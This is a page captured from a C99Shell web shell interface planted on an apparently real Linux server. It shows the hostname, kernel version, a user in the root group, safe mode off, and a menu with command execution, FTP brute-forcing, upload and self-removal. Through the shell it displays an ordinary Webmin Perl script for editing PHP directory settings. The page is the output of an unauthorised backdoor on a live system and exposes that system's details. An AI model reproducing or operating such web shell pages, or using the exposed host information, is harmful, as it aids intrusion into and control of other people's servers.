!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/phpini/   drwxr-xr-x
Free 26.6 GB of 117.98 GB (22.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     edit_dirs.cgi (1.72 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Show options for program directories and directory limits

require './phpini-lib.pl';
&ReadParse();
&can_php_config($in{'file'}) || &error($text{'list_ecannot'});
$conf = &get_config($in{'file'});

&ui_print_header("<tt>$in{'file'}</tt>", $text{'dirs_title'}, "");

print &ui_form_start("save_dirs.cgi", "post");
print &ui_hidden("file", $in{'file'}),"\n";
print &ui_table_start($text{'dirs_header'}, "width=100%", 2);

# Include files directories
$include = &find_value("include_path", $conf);
print &ui_table_row(&opt_help($text{'dirs_include'}, 'include'),
    &ui_radio("include_def", $include ? 0 : 1,
          [ [ 1, $text{'default'} ], [ 0, $text{'dirs_below'} ] ]).
    "<br>\n".
    &ui_textarea("include", join("\n", split(/:/, $include)), 3, 60)." ".
    &file_chooser_button("include", 1, undef, undef, 1));

# Extensions directory
print &ui_table_row($text{'dirs_ext'},
    &ui_opt_textbox("ext", &find_value("extension_dir", $conf),
            60, $text{'default'})." ".
    &file_chooser_button("ext", 1));

# Enabled extensions
my @exts = map { [ $_->{'value'}, $_->{'value'} ] } &find("extension", $conf);
my @avail = &list_available_extensions($conf, $in{'file'});
if (@avail) {
    print &ui_table_row($text{'dirs_exts'},
        &ui_multi_select("exts", \@exts, \@avail, 10, 1));
    }

# Can accept uploads?
print &ui_table_row(&opt_help($text{'dirs_upload'}, 'file_uploads'),
    &onoff_radio("file_uploads"));

# Upload temp files directory
print &ui_table_row($text{'dirs_utmp'},
    &ui_opt_textbox("utmp", &find_value("upload_tmp_dir", $conf),
            60, $text{'default'})." ".
    &file_chooser_button("utmp", 1));

print &ui_table_end();
print &ui_form_end([ [ "save", $text{'save'} ] ]);

&ui_print_footer("list_ini.cgi?file=".&urlize($in{'file'}),
         $text{'list_return'});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--